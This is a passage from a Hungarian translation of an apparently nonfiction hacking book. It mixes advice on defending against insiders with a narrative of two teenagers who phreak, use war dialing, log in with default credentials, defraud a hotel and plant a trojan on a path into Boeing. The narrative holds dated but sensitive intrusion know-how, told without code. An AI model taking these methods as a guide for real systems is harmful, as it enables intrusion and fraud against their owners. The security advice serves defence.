saját nevüket se mondják meg –, mert elhitték azt a pletykát, hogy
képes vagyok betörni a kormányzat titkos adatbázisaiba, és törlöm
onnan bárkinek a személyiségét, akár egy szövetségi rendőrbíróét is.
Azt hiszem, eggyel többször nézték meg „A hálózat csapdájában” című
filmet, mint kellett volna.

ÓVINTÉZKEDÉSEK

Az alábbiak a legjelentősebb biztonsági óvintézkedések, amelyek


hatékonyak lehetnek a belső visszaélések megelőzésében és
észlelésében:
Felelősségre vonhatóság. A két legelterjedtebb gyakorlat
felelősségre vonhatósági kérdéseket vet fel: az egyik az úgy nevezett
munkakör alapú felhasználói nevek (accountok) használata – több
felhasználó által közösen használt felhasználói nevek; a másik pedig a
felhasználói nevek és jelszavak megadásának gyakorlata, amely
hozzáférést biztosít olyan esetekre, amikor egy alkalmazott nincsen az
irodában vagy nem elérhető. Mindkét gyakorlat hihető tagadásra teremt
lehetőséget, ha a dolgok kezdenek igazán rosszul menni.
Egész egyszerűen nem szabad megtűrni, sőt inkább mindenestől
tiltani kell az accountadatok megoszthatóságát. Ide tartozik az is, hogy
egy dolgozó csak akkor használhassa a munkaállomását, ha ehhez
bejelentkezési információt kell megadnia.
Célban gazdag környezet. A legtöbb vállalatnál, ha egy támadó
módot talál arra, hogy fizikailag bejusson a létesítmény
munkaterületére, akkor könnyedén hozzáférést szerezhet a
rendszerekhez. Kevés dolgozó zárja le a gépét, illetve használ
képernyővédő vagy újraindító jelszavakat, amikor elhagyja a
munkahelyét. Egy rosszindulatú személynek csupán másodpercekre
van szüksége ahhoz, hogy titkos figyelőszoftvert telepítsen egy
védtelen munkaállomásra. Egy bankban a pénztárosok mindig bezárják
a kasszát, mielőtt elmennek onnan. Sajnos az egyéb intézményekben
ritkán találkozni ilyen gyakorlattal. Mérlegeljük egy olyan eljárás
alkalmazását, amely megköveteli a képernyővédő jelszavak vagy
egyéb, a gépet elektronikusan zároló programok használatát.
Figyeljünk arra, hogy az informatikai részleg a megfelelő
beállításokkal betartassa ezt az eljárást.
Jelszókezelés. Barátnőmet nemrégiben egy a Fortune 50-es listáján
szereplő nagyvállalat alkalmazta, amely megjósolható séma szerint
osztotta ki a külső, web alapú intranet hozzáféréshez való jelszavakat: a
felhasználó nevét egy véletlenszerűen kiválasztott háromjegyű szám
követte. A jelszót akkor állítják be, amikor az alkalmazottat felveszik,
akinek nincs lehetősége a jelszó megváltoztatására. Ez így lehetővé
teszi, hogy bármely alkalmazott írjon egy egyszerű szkriptet, amely
legfeljebb 1000 próbálkozásból kitalálja a jelszót – ez csupán
másodpercek kérdése. A használt jelszavaknak, függetlenül attól, hogy
a cég állítja be őket vagy az alkalmazottak választják ki, nem szabad
olyan sémát követniük, amely ennyire egyszerűen megjósolhatóvá teszi
azokat.
Fizikai hozzáférés. A cég hálózatát ismerő, jól értesült
alkalmazottak fizikai hozzáférésüket felhasználva egyszerűen
veszélyeztethetik a rendszereket, amikor senki nincs a helyszínen.
Egyszer a kaliforniai GTE, egy telekommunikációs cég alkalmazottja
voltam. Az, hogy fizikai hozzáférésem volt az épülethez, olyan volt,
mintha a mennyországhoz lenne kulcsom – minden tárva-nyitva állt
előttem. Bárki odasétálhat egy alkalmazott szobájában vagy irodájában
levő munkaállomáshoz, és hozzáférést szerezhet a bizalmas
információkat tartalmazó rendszerekhez. Ha az alkalmazottak
biztonságos BIOS jelszavak használatával és kijelentkezéssel, illetve
gépeik zárolásával megfelelő módon biztonságba helyeznék asztali
gépeiket, munkaállomásaikat, laptopjaikat és PDA eszközeiket, a belső
rossz fiúknak több időre lenne szükségük céljaik eléréséhez.
Képezzük ki az alkalmazottakat arra, hogy bátran és nyugodtan
szólítsák meg és kérdezzék ki az olyan személyeket, akiknek
személyazonossága nem egyértelmű – ez különösen fontos az érzékeny
területeken. Használjunk fizikai biztonsági ellenőrző eszközöket,
például kamerákat és kártyás beléptető rendszereket a belépés és a
létesítményen belüli mozgás felügyeletére. Rendszeresen ellenőrizzük
a fizikai belépési és kilépési naplókat, hogy felfigyeljünk az esetleges
szokatlan viselkedés-mintákra; különösen fontos ez biztonsági
incidensek megtörténte után.
„Halott” íróasztalok és egyéb hozzáférési pontok. Amikor egy
alkalmazott elhagyja a céget vagy más pozícióba kerül, és ezáltal
üresen hagyja íróasztalát, egy rosszindulatú belsős az élő hálózati
csatlakozók segítségével úgy tudja használni a hálózatot, hogy nem
fedi fel a személyiségét. Vagy ami ennél is rosszabb, gyakran az
íróasztalon marad a hálózathoz csatlakoztatott munkaállomás, amelyet
így bárki, akár a rosszindulatú bennfentes is használhat (illetve bármely
jogosulatlan látogató, aki felfedezi az elhagyott íróasztalt). Az egyéb
helyeken, például tárgyalókban levő hozzáférési pontok szintén könnyű
hozzáférést kínálnak a károkozásra hajlamos belsősöknek. Mérlegeljük
a használaton kívüli hálózati csatlakozók kikapcsolását, hogy ezzel
megakadályozzuk a névtelen és jogosulatlan hozzáférést.
Gondoskodjunk arról, hogy az üresen álló íróasztaloknál levő
számítógépes rendszerek védve legyenek a jogosulatlan hozzáféréssel
szemben.
Távozó alkalmazottak. Minden alkalmazottat, akinek felmondunk,
potenciális veszélyforrásként kell kezelni. Az ilyen dolgozók esetében
figyelni kell a bizalmas üzleti információhoz való hozzáférésre,
különösen nagymennyiségű adat másolása vagy letöltése esetén. Az
immár bárki számára hozzáférhető apró USB kulcsokkal, amelyek akár
egy gigabájtnyi vagy annál is több adatot képesek tárolni, percek
kérdése, hogy valaki nagymennyiségű titkos információt töltsön le,
majd kisétáljon vele.
Rutinszerű gyakorlatnak kellene léteznie arra, hogy mielőtt egy
alkalmazottat értesítünk az elbocsátásáról, lefokozásáról vagy általa
nem kívánt áthelyezéséről, korlátozzuk a hozzáférését. Azt is
mérlegeljük, hogy érdemes lehet az alkalmazott számítógép-használatát
figyelve megakadályozni a jogosulatlan vagy potenciálisan káros
tevékenységeket.
Jogosulatlan hardver telepítése. Egy rosszindulatú belsős
könnyedén hozzáfér egy másik alkalmazott íróasztalához, és hardveres
vagy szoftveres billentyűzetnaplózót telepítve jelszavakat vagy más
bizalmas információkat szerezhet meg. Egy USB kulcs nagyon
egyszerűvé teszi az adatlopást. A hardver eszközök írásbeli engedély
nélküli telepítését megtiltó biztonsági irányelveket, noha azok egyes
körülmények között igenis indokoltak, bevallottan nehéz ellenőrizni; a
jó szándékú alkalmazottakat feleslegesen zaklatjuk, míg a
rosszindulatúak számára nincsen ösztönzés, hogy miért tartsák be a
szabályokat.
Egyes nagyon bizalmas információkat kezelő szervezeteknél
szükségszerű lehet a munkaállomásokon levő USB portok eltávolítása
vagy kikapcsolása.
Rendszeresen kell tartani „körbesétálós” ellenőrzéseket. Ezeknél az
ellenőrzéseknél különösképpen kell figyelniük arra, hogy a gépekhez
ne legyen jogosulatlanul telepített vezeték nélküli eszköz, hardveres
billentyűzetnaplózó vagy modem csatlakoztatva, illetve csak a
szabályszerűen telepített szoftverek legyenek megtalálhatók rajtuk.
A biztonsági vagy informatikai személyzet egy 802.11 szabványt
támogató PDA, de akár egy Microsoft XP-vel és vezeték nélküli
hálókártyával ellátott laptop segítségével is könnyedén ellenőrizheti a
közvetlen közelben levő, jogosulatlan vezeték nélküli hozzáférési
pontok jelenlétét. A Microsoft XP-ben van egy beépített alkalmazás,
amely egy párbeszéd-ablakot jelentet meg, amikor a gép vezeték nélkül
hozzáférési pontot észlel a közvetlen közelben.
Megkerülő folyamatok. Mivel az alkalmazottak ismerik a
szervezeten belüli kritikus folyamatokat, kedvező helyzetben vannak
ahhoz, hogy felismerjék a csalás vagy tolvajlás észlelésére használt
„checks and balances” (fékek és egyensúlyok) rendszerének
gyengeségeit. Egy tisztességtelen alkalmazott olyan pozícióban van,
hogy az üzletmenettel kapcsolatos tudása alapján lophat, illetve komoly
károkat okozhat. A belsősöknek jellemzően szabad hozzáférésük van
az irodákhoz, az irattároló szekrényekhez, a belső
levelezőrendszerekhez, illetve tisztában vannak a napi üzleti
folyamatokkal.
Érdemes elemezni az érzékenyen és kritikus üzleti folyamatokat,
hogy képesek legyünk a gyengeségeket azonosítani, és a megfelelő
óvintézkedéseket alkalmazhassuk. Egyes helyzetekben az érzékeny
folyamat során felmerülő kötelességek oly módon történő elválasztása,
hogy az egyik alkalmazottat egy másik ellenőrzi, hatásosan
csökkentheti a biztonsági kockázatot.
A helyszíni látogatókra vonatkozó irányelvek. Készítsünk
biztonsági szabályzatot a külső látogatók, így a más telephelyekről
érkező dolgozók számára. Hatékony biztonsági ellenőrzés, ha a
létesítmény területére való belépés előtt egy hivatalos igazolvánnyal
azonosítjuk a látogatókat, és a személyes adataikat egy biztonsági
naplóban rögzítjük. Ha bármilyen biztonsági incidens történne,
lehetőség lesz azonosítani a bajkeverőt.
Szoftverleltár és auditálás. Vezessünk leltárt az egyes rendszerekre
telepített vagy licencelt összes hivatalos szoftverről, és rendszeresen
ellenőrizzük ezen rendszerek megfelelőségét. A leltározási folyamat
nem csupán a szoftverlicencelési szabályoknak való megfelelést
biztosítja, de arra is jó lehet, hogy a biztonságot negatívan érinthető,
jogosulatlan szoftvertelepítéseket azonosíthassuk.
Az olyan kártékony szoftverek, mint a billentyűzetnaplózók, az
adware-ek vagy a másfajta spyware-ek jogosulatlan telepítését nem
egyszerű észrevenni, ha a fejlesztők elég ügyesek voltak a program
operációs rendszeren belüli elrejtésében.
Mérlegeljük külső, kereskedelmi szoftverek használatát a kártékony
programok azonosítására. Ilyenek lehetnek:
Spycop (www.spycop.com)
PestPatrol (www.pestpatrol.com)
Adware (www.lavasoftusa.com)
Rendszerauditálás a szoftverek sértetlensége érdekében. Az
alkalmazottak vagy a rosszindulatú beavatottak lecserélhetik a kritikus
operációs rendszerfájlokat vagy alkalmazásokat, amivel kikerülhetik a
biztonsági ellenőrzéseket. Ebben a történetben az elítélt hackerek a PC
Anywhere alkalmazást változtatták meg úgy, hogy az az ikonjának a
tálcán való megjelenése nélkül fusson, így ne lehessen észrevenni. A
történetben szereplő börtöntisztek soha nem vették észre, hogy minden
mozdulatukat rögzítették, mivel Danny és William virtuálisan a hátuk
mögül figyelte őket.
Bizonyos körülmények között célszerű lehet egy sértetlenségi
ellenőrzést végrehajtani, és ehhez egy külsős alkalmazást használni,
amely figyelmezteti a megfelelő szakembereket, ha bármilyen változást
hajtottak végre a „figyelendők listáján levő” rendszerfájlokon vagy
alkalmazásokon.
Túlzott jogosultságok. A Windows alapú környezetben sok
végfelhasználó jelentkezik be a gépére helyi rendszergazdai
jogosultságokkal. Ez a gyakorlat, noha igen kényelmes, nagyban
megkönnyíti, hogy egy barátságtalan bennfentes billentyűzetnaplózót
vagy hálózatfigyelő (sniffer) programot telepítsen bármely rendszerre,
amelyen rendszergazdai jogosultsága van. A távollevő hackerek az e-
mail csatolt állományába rejtett kártékony programokat küldhetnek,
amelyet a gyanútlan felhasználó megnyithat. Az ilyen csatolmányok
által jelentett fenyegetés minimálisra csökkenthető, ha a
„legalacsonyabb jogosultságok” szabályt követjük, ami azt jelenti,
hogy a felhasználóknak és a programoknak a kívánt feladat
elvégzéséhez szükséges legalacsonyabb jogosultságokkal kell
rendelkezniük.

ZÁRÓJELBEN

Egyes helyzetekben a józan ész azt diktálja, hogy a túlzott biztonsági


óvintézkedések egyszerűen időpazarlást jelentenek. Egy katonai
iskolában például nem számítanánk arra, hogy a hallgatóság tele van
olyan emberekkel, akik állandóan az alkalmat keresik a szabályok
kijátszására. Egy általános iskolában sem tartanánk attól, hogy a
tízéves gyerekek többet tudnak a számítógépes biztonságról, mint az
iskola informatikai guruja.
És egyetlen börtönben sem számítanánk arra, hogy az állandó
felügyelet alatt álló, szigorú szabályok szerint élő elítéltek megtalálják
a módját nemcsak annak, hogy internetezzenek, hanem hogy naponta
több órát töltsenek zenehallgatással, filmnézéssel, az ellenkező nemmel
folytatott beszélgetésekkel és az informatika egyre alaposabb
megismerésével.
A tanulság: ha mi felelünk valamely iskola, munkacsoport, cég vagy
más szervezet informatikai biztonságáért, akkor azt kell feltételezni,
hogy rosszindulatú ellenségek, akik akár a szervezeten belülről is
jöhetnek, keresik azt a kis törést a falon, a védelem leggyengébb
láncszemét, hogy feltörjék a rendszert. Ne gondoljuk azt, hogy
mindenki a szabályok szerint játszik. Tegyünk meg a potenciális
betörések ellen mindent, ami költséghatékony és ne felejtsünk az után
kutatni, hogy vajon mire nem gondoltunk még. A rossz fiúk arra
számítanak, hogy gondatlanok leszünk.

4. fejezet

Rabló-pandúr
Besétáltam a rendfenntartó szakemberekkel teli tanterembe, és azt
mondtam: – Felismerik ezeket a neveket? – Felolvastam a listát. Az
egyik szövetségi hivatalnok elmondta, hogy ezek a Seattle-i Kerületi
Bíróság bírói. Mire azt mondtam: – Nos, akkor itt van egy jelszófájl 26
feltört jelszóval. – A szövetségiek arca egészen elzöldült.
Don Boelling, Boeing Aircraft
Matt és Costa egyáltalán nem terveztek támadást a Boeing Aircraft
ellen; egyszerűen így alakult. Azonban ez az eset, illetve a
hackertevékenységük láncolatában levő egyéb incidensek kimenetele
lehetne figyelmeztetés. A két fiú szerepelhetne egy az olyan
kölyökhackereket óva intő óriásplakát-kampányban, akik túl fiatalok
ahhoz, hogy mérlegeljék tetteik következményét.
Costa Katsaniotis 11 éves korában kezdett el ismerkedni a
számítógépekkel, amikor kapott egy Commodore Vic 20-at, és
nekilátott, hogy programozással fokozza a gép teljesítményét. Már
ilyen zsenge korában írt egy kis szoftvert, amely lehetővé tette, hogy
barátja betárcsázással lássa az ő merevlemezének tartalmát. – Ekkor
kezdtem el igazán foglalkozni a számítógépekkel, és megszeretni a
számítógéphez való mitől működnek a dolgok hozzáállást. – És nem
csak a programozás érdekelte: alaposan megvizsgálta a hardvert is, és –
ahogy elmondta – nem aggódott azon, hogy elveszíti mondjuk a
csavarokat, hiszen „három éves korom óta szereltem szét a dolgokat”.
Anyja nyolcadikos koráig egy keresztény magániskolába járatta,
majd állami iskolába küldte. Ebben az életkorban a zenei ízlése a U2
(tőlük volt az első lemeze, és még ma is az együttes nagy rajongója),
illetve a Def Leppard és „más sötétebb zenék” felé fordult; eközben
számítástechnikai érdeklődése is kibővült, elkezdett „elmélyedni
abban, hogy mit tudok kihozni a telefonszámokból”.
Néhány idősebb srác hallott a 800-WATS kiterjesztésekről, vagyis az
olyan telefonszámokról, amelyeket ingyenes távolsági beszélgetésre
tudtak használni.
Costa szerette a számítógépeket, és ösztönösen értette őket. Talán az
apa hiánya is fokozta a tinédzser érdeklődését egy olyan világ iránt,
amit teljes mértékben irányítása alatt tudott tartani.
Majd középiskolában jött egy kis törés, és elkezdtem a lányokkal
foglalkozni. De továbbra is megvolt a számítógépek iránti
szenvedélyem, és a gépek mindig a kezem ügyében voltak. Igazából
mindaddig nem kezdtem hackelgetni, amíg nem volt egy olyan
számítógépem, amely alkalmas volt erre, és ez a gép a Commodore 128
lett.
Costa egy Washington állambeli BBS-en (üzenőfalrendszer; az
Internet elterjedését megelőző korszak legnépszerűbb elektronikus
adatcsere-rendszere, amelyben egy adott téma iránt érdeklődő
felhasználók üzeneteket és állományokat cserélhettek egymással)
találkozott Mattel – Charles Matthew Andersonnal. – Úgy hiszem,
talán egy évig telefonon és az üzenőfalon keresztül barátkoztunk, és
csak ekkor találkoztunk. – Matt, akinek „Cerebrum” a nick-neve, úgy
érzi, „teljesen normális” gyerekkora volt. Apja a Boeingnél dolgozott
mérnökként, és volt otthon egy számítógépe, amit Matt is
használhatott. Könnyű elképzelni, hogy az apját annyira zavarta a fiú
zenei ízlése („industrial és egyéb sötétebb cucc”), hogy elkerülte a
figyelmét a Matt által a számítógépen bejárt veszélyes út.
Körülbelül kilencéves koromban kezdtem programozni tanulni.
Tinédzseréveim nagy részét azzal töltöttem, hogy grafikákhoz és
zenéhez jussak a számítógépemen. Ez az egyik oka annak, hogy még ma
is szeretem a számítógépeket – a multimédiás anyagok hackelése
igazán jó móka.
Felsőéves középiskolásként találkoztam ezzel az egész hackeléssel,
annak is a phreaking oldalával, megtanulva azt, hogy hogyan
használhatjuk ki a tanárok és az adminisztrátorok által távolsági
beszélgetésekre használt telefonos hálózatot. Középiskolai éveimben
komolyan benne voltam ebben.
Matt az osztály 10 legjobbja között fejezte be a középiskolát, a
Washingtoni Egyetemre iratkozott be, nagyméretű (legacy) rendszerek
programozásával, mainframe programozással kezdett foglalkozni. A
kollégiumban, ahol legális felhasználói neve volt egy Unix gépre,
elkezdett autodidakta módon Unixot tanulni, „némi segítséget kapva az
underground fórumoktól és weboldalaktól”

Phreaking[1]

Miután egy csapat lettek, úgy tűnt, mintha Matt és Costa rossz
irányba vinnék egymást, a hackelés lejtőjén lefele haladtak a
telefonrendszerek feltörése felé; ez utóbbi tevékenységet nevezik
egyébként „phreaking”-nek. Costa emlékszik, hogy az egyik este olyan
expedícióra indultak, amit a hackerek „kukabúvárkodásnak” neveznek:
a mobiltársaságok közvetítőállomásainál hagyott szemeteskukák
tartalmát kutatták át. – A daráltkávé-maradványok és egyéb
gusztustalan szemét között találtunk egy listát, amely az
átjátszótornyokat és a telefonszámokat tartalmazta; a telefonszámot és
az elektronikus sorozatszámot (ESN), amely az egyes
mobiltelefonokhoz tartozó egyedi azonosító. Mintha egy ikerpár
emlékezne vissza közös gyerekkorának valamelyik élményére, úgy szól
közbe Matt: – Ezek tesztszámok voltak, amelyekkel a műszakiak a
jelerősséget ellenőrizték. Speciális mobiltelefonjaik voltak, amelyek
egyenként egy adott toronyhoz tartoztak.
A fiúk OKI 900-as mobilokat vásároltak, illetve egy olyan eszközt,
amely a telefonok chipjébe tudja írni az új programot. Nem egyszerűen
új számokat programoztak be; miközben ezt tették, egy különleges
firmware frissítést is telepítettek, amely lehetővé tette, hogy bármilyen
kívánt telefonszámot és ESN számot beprogramozzanak a telefonokba.
Azzal, hogy a telefonokat az általuk talált különleges tesztszámokra
programozták, ingyenes telefonszolgáltatáshoz segítették magukat. – A
felhasználó kiválasztja, melyik számot akarja a híváshoz használni. Ha
kellett, nagyon gyorsan tudtunk egy másik számra váltani – mondta
Costa.
(Ezt nevezem én „Kevin Mitnick mobiltelefon-előfizetésnek”: nincs
havidíj, nincs percdíj, de lehet, hogy végül mégis nagy lesz a számla –
tudják, mire gondolok.)
Az átprogramozásnak köszönhetően Matt és Costa bárkit
felhívhattak, a világ bármely pontján legyen is a hívott fél; ha a
hívásokat naplózták is, úgy kerültek be a könyvekbe, mint a
mobiltársaság hivatalos hívásai. Nincsenek díjak, nincsenek kérdések.
És minden telefonphreaker vagy hacker így szereti ezt csinálni.

A bíróságon

Bíróságra kerülni; nagyjából ez az utolsó dolog, amire egy hacker


vágyik, ezt magam is jól tudom. Costa és Matt közös hackeléseik korai
szakaszában jutottak el a bíróságra – azonban nem a megszokott
értelemben.
A kukabúvárkodás és a telefonphreaking mellett a két barát gyakran
állította számítógépeit War dialingra, ami nem más, mint olyan
betárcsázó modemek keresése, amelyek számítógépes rendszerekhez
vannak csatlakoztatva, és amelyeket ők feltörhetnek. Egy éjszaka akár
1200 telefonszámot is ellenőrizhettek A megállás nélkül tárcsázó
gépeikkel két-három nap alatt egy teljes számtartományon
végigfutottak. Amikor visszatértek a gépeikhez, a számítógép naplója
megmutatta, hogy mely számoktól kaptak választ. – Egy seattle-i szám
előtagján, a 206-553-on futtattam a wardialer programomat – mesélte
Matt. – Az összes ilyen szám különböző szövetségi ügynökségekhez
tartozik. Szóval a telefonszám elég meleg célpont volt, mivel itt találtad
a szövetségi kormány számítógépeit. – Igazából semmilyen különösebb
okuk nem volt arra, hogy a szövetségi ügynökségekkel foglalkozzanak.
Costa: Gyerekek voltunk. Nem volt tervünk.
Matt: Tulajdonképpen csak annyit csináltunk, hogy kidobtuk a hálót
a tengerbe, és néztük, hogy milyen halat fogunk ki.
Costa: Inkább olyan „Mit csináljunk ma este” típusú dolog volt: mit
tudunk ma végigtapogatni?
Costa az egyik este megnézte a wardialer naplóját, és azt látta, hogy
a program egy olyan számítógépbe tárcsázott be, amely egy „U.S.
District Cour-house” (Amerikai Kerületi Bíróság) fejlécű üzenetet
küldött vissza, amely ezen túlmenően a „szövetségi tulajdon” szöveget
is tartalmazta. Azt gondolta, „ez kicsit meredek”.
De hogyan jussanak be egy ilyen rendszerbe? Szükségük volt egy
felhasználói névre és egy jelszóra. – Azt hiszem, Matt jött rá – mondja
Costa. A válasz meglepően egyszerű volt: felhasználónév: „public”;
jelszó: „public”. Szóval egyrészt ott volt „ez az igazán kemény, ijesztő
üzenet” arról, hogy az oldal szövetségi tulajdon, mégsem volt
biztonsági védelem az ajtón.
– Amint a rendszerükön belül voltunk, megvolt a jelszófájl – mondja
Matt. Könnyedén megszerezték a bírók belépési nevét és jelszavát. – A
bírók az ezen a bírósági rendszeren levő bírósági naplókba tekintettek
bele, ahol az esküdtszékről szóló információkat vagy korábbi eseteket
találtak.
Matt elmondta, hogy érzékelve a veszélyt, „nem nagyon mentünk
bele a bírósági dolgokba”. Legalábbis akkor még nem.
A szálloda vendégei

Eközben a fiúk mással is el voltak foglalva. – Egy másik


megtámadott célpont egy hitelszövetkezet volt. Matt felismert egy
mintát a kódszámaikban, amely egyszerűvé tette számukra, hogy a
szövetkezet költségén telefonáljanak. – Azt is tervezték, hogy bejutnak
a Közlekedési Minisztérium számítógépes rendszerébe, „és
megnézzük, hogy jogosítványokat vagy valami mást tudunk-e
magunknak csinálni”.
Folytatták ismereteik bővítését és a számítógépek feltörését. –
Rengeteg város-környéki számítógépen voltunk. Voltunk
autókereskedésekén. Óh igen, és volt egy hotel is Seattle környékén.
Felhívtam őket, és úgy tettem, mintha a hotel foglalási rendszerét
készítő cég szoftvertechnikusa lennék. Az egyik recepciós hölggyel
beszéltem, és azt magyaráztam neki, hogy műszaki problémákba
futottunk, és nem fogja tudni a munkáját végezni, ha nem hajt végre
néhány változtatást.
Ezzel a szokásos, jól ismert social engineering trükkel Matt
könnyűszerrel megszerezte a rendszer belépési adatait. – A
felhasználónév és a jelszó „hotel” és „learn” (tanulni) voltak. – Ezek
voltak a szoftverfejlesztők alapértelmezett beállításai, amiket soha nem
változtattak meg.
Az első szálloda számítógépeibe való betörés tanulópálya volt a
foglalási szoftvercsomaghoz, amelyről kiderült, hogy igen széles
körben használják. Amikor néhány hónappal később a fiúk egy másik
hotelt vettek célba, azt feltételezték, hogy az is ugyanezt a szoftvert
alkalmazza, amit már jól ismertek. És úgy gondolkodtak, hogy itt is az
alapértelmezett beállításokat használják. Mindkétszer igazuk lett. Costa
így emlékszik vissza:
Bejelentkeztünk a szállodai számítógépbe. Tulajdonképpen ugyanazt
a képernyőt láttam, mintha a szállodában ültem volna. Szóval
beléptem, és foglaltam egy lakosztályt, olyan 300 dolláros
luxuslakosztályt, ami a tengerre néz, van benne vizibár meg minden.
Álnevet használtam, és egy olyan megjegyzést vittem be, hogy 500
dollár készpénzletétet tettünk le a szobára. Egyéjszakás murira
lefoglalva. Végül egy teljes hétvégét maradtunk, buliztunk és kiürítettük
a minibárt.
A hotel számítógépes rendszeréhez való hozzáféréssel a hotelben
megszálló vendégek adataihoz, „többek között pénzügyi adataikhoz” is
hozzájutottak.
Mielőtt kijelentkeztek volna, megálltak a recepciónál, és
megpróbáltak pénzt visszakapni a „készpénzletétből”. Amikor a
recepciós azt mondta, hogy majd csekken küldik a pénzt, hamis címet
mondtak be, majd eljöttek.
– Soha nem ítéltek el ezért – mondja Costa, majd hozzáteszi: –
Remélem már rég elévült. – Megbánás? Semmi. – Legalább volt egy
kis jutalmunk a vízibárban.

Ajtónyitás

E vad hétvége után a felbátorodott fiúk visszatértek


számítógépeikhez, hogy lássák, mit hozhatnak ki a Kerületi Bíróságra
való betörésükből. Gyorsan kiderítették, hogy a bírósági számítógépen
használt operációs rendszert egy cégtől vették, amit nevezzünk most
Subsequentnek. A szoftverben volt egy olyan beépített funkció, amely
minden alkalommal hívást indított a Subsequentehez, amikor
szoftverpatch-ekre volt szükség; Costa így magyarázta ezt: – Ha a
Subsequent egy ügyfele tűzfalat vásárolt a számítógépére és az
operációs rendszer patch-eket igényelt a tűzfal futtatásához, a cégnek
megvolt a módszere arra, hogy az ügyfél bejelentkezzen a Subsequent
céges számítógépes rendszerére és megszerezze a javításokat.
Alapjában véve így működött ez akkor.
Matt egy másik barátja, szintén C programozó, tudott trójai
programokat írni. Ezek olyan szoftverek, amelyek titkos utat
biztosítanak a hackernek azokba a számítógépekbe, amelyekbe
korábban már bejutott. Ez akkor nagyon hasznos, ha a jelszavak
megváltoztatásával vagy egyéb lépésekkel próbálják blokkolni a
bejutást. Matt a Kerületi Bíróságon levő számítógépen keresztül
elküldte a trójait a Subsequent céges számítógépére. A szoftvert úgy
írták meg, hogy „megszerezze a jelszavakat, és egy titkos fájlba írja
őket, illetve rendszergazdai jogosultságokat adjon nekünk arra az
esetre, ha bármikor ki tudnának zárni minket”.
A Subsequent számítógépébe való betörés váratlan
bónuszjutalommal járt: a Subsequent operációs rendszert futtató egyéb
cégek listájához való hozzáféréssel. Tiszta főnyeremény. –
Megmutatta, hogy mely másik gépekhez férünk hozzá. – A listán
szereplő egyik név egy hatalmas helyi cég volt, az, ahol Matt apja is
dolgozott: a Boeing Aircraft.
– Megszereztük a Subsequent egyik mérnökének felhasználói nevét
és jelszavát, és azt találtuk, hogy ők dolgoztak a Boeingnek eladott
számítógépeken. Rájöttünk, hogy hozzáférünk a Boeing összes
számítógépének felhasználói nevéhez és jelszavához – mondta Costa.
Első alkalommal, amikor Matt a Boeing rendszeréhez való külső
csatlakozás érdekében tárcsázta a telefonszámot, megütötte a
főnyereményt.
Az utoljára betárcsázó alkalmazott nem bontotta rendesen a
kapcsolatot, így amikor betárcsáztam, valamelyik felhasználó
sessionjében voltam, így hozzájutottam valakinek a Unix shelljéhez, és
az olyan, mintha meglenne a fickó ujjlenyomata.
(Egyes régebbi betárcsázó modemeket nem állították be úgy, hogy a
vonal bontásakor automatikusan kilépjenek a rendszerből. Ha fiatal
koromban ilyen típusú modembeállítással találkoztam, a
telefontársaság központjának küldött paranccsal vagy social
engineering módszerrel egy műszaki embert rávettem a kapcsolat
kihúzására, így bontottam a felhasználó kapcsolatát. Amint a kapcsolat
bontva volt, be tudtam tárcsázni, és hozzáfértem ahhoz az accounthoz,
amely a kapcsolat bontásakor be volt jelentkezve. Matt és Costa
viszont egyszerűen egy még élő kapcsolatba botlott bele.)
Az, hogy megvolt nekik egy felhasználó Unix shellje, azt jelenti,
hogy a tűzfalon belül voltak, és a számítógép gyakorlatilag arra várt,
hogy utasításokat adjanak neki. Matt így emlékszik vissza:
Így azonnal tovább nyomultam, és feltörtem a jelszavát, amit utána
azokon a helyi gépeken használtam, ahol sikerült rendszergazdai
jogosultságot szereznem. Amint megvolt a rendszergazdai jogosultság,
használni tudtunk egyes más accountokat is, megpróbálván a shell
előzményeiket átnézve bejutni olyan további gépekbe, amelyekhez ezek
az emberek hozzáfértek.
Ha véletlen egybeesésnek tekintjük, hogy Matt hívásakor a modem
éppen kapcsolatban volt, akkor vajon mekkora véletlennek
minősíthetjük azt, ami a Boeingnél éppen a Matt és Costa által
megindított támadás idejében zajlott?

A barikádok védelme
Ebben a pillanatban a Boeing Aircraft éppen magas szintű
számítógépes biztonsági szemináriumnak adott otthont, amelyen az
üzleti szférából, a rendfenntartó szervektől, az FBI-től és a
titkosszolgálattól érkező szakemberek vettek részt.
Don Boelling, aki jól ismerte a Boeing számítógépes biztonsági
intézkedéseit és az ezek jobbá tételére irányuló erőfeszítéseket, részt
vett az előadásokon. Don a cégen belül évek óta harcolt a biztonságért.
– Hálózatunk és informatikai biztonságunk pontosan olyan volt, mint
bárki másé: gyakorlatilag nulla. És ez kimondottan nyugtalanított
engem.
Még 1988-ban, amikor az újonnan létrehozott Boeing Electronics-
nél dolgozott, Don besétált egy megbeszélésre, ahol a részleg elnöke és
több alelnök vett részt, és azt mondta nekik: – Nézzék, mit tudok
csinálni a hálózatunkkal. – Meghackelte a modemvonalakat, és
bemutatta, hogy nincsen rajtuk jelszó, majd továbbment, és
megmutatta, hogy bármelyik gépet meg tudja támadni. A vezetők
látták, hogy mindegyik számítógépen van egy vendég felhasználói név,
ezek mindegyikének „guest” volt a jelszava. És Don azt is megmutatta
nekik, hogy egy ilyen account mennyire megkönnyíti a jelszófájlhoz
való hozzáférést, sőt egy másik, akár a cégen kívüli számítógépre való
letöltését.
Elérte a célját. – Ez indította el a számítógépes biztonsági programot
a Boeingnél – mondta Don. De amikor Matt és Costa elkezdték
betöréseiket, erőfeszítéseik még gyerekcipőben jártak. Kéményen
dolgozott, hogy meggyőzze a vezetőséget arról, hogy fordítsanak
erőforrásokat a számítógépes biztonságra. A Matt és Costa-féle epizód
olyan fordulópontnak bizonyaik, amely után valóban megtették.
A biztonság szószólójaként betöltött szerepe oda vezetett, hogy ő
szervezte meg a Boeingnél tartott úttörő jellegű számítástechnikai
képzést, amelynek célja a bírósági szakértők képzése volt. – Egy
kormányzati hivatalnok megkeresett bennünket, és az iránt érdeklődött,
hogy támogatnánk-e információval egy rendfenntartó és üzleti
szakemberekből álló csoport elindítását. A szervezetnek az volt a célja,
hogy a rendfenntartó szakemberek informatikai képzését segítse, hogy
ezáltal azok olyan ismeretekkel, többek között csúcstechnikájú
nyomozási technikákkal ismerkedhessenek meg, amelyeket a bírósági
eljárások során használhatnak, így lettem én az egyMk kulcsszereplő,
aki segített ezt összehozni. Képviseltette magát a Microsoft, a US West
telefontársaság, egy pár bank, különböző pénzügyi szervezetek.
Titkosszolgálati ügynökök is eljöttek, hogy megosszák a high-tech
csalásokkal kapcsolatos ismereteiket.
Donnak sikerült rávennie a Boeinget, hogy szponzorálja az üléseket,
amelyeket a cég egyik számítógépes továbbképző központjában
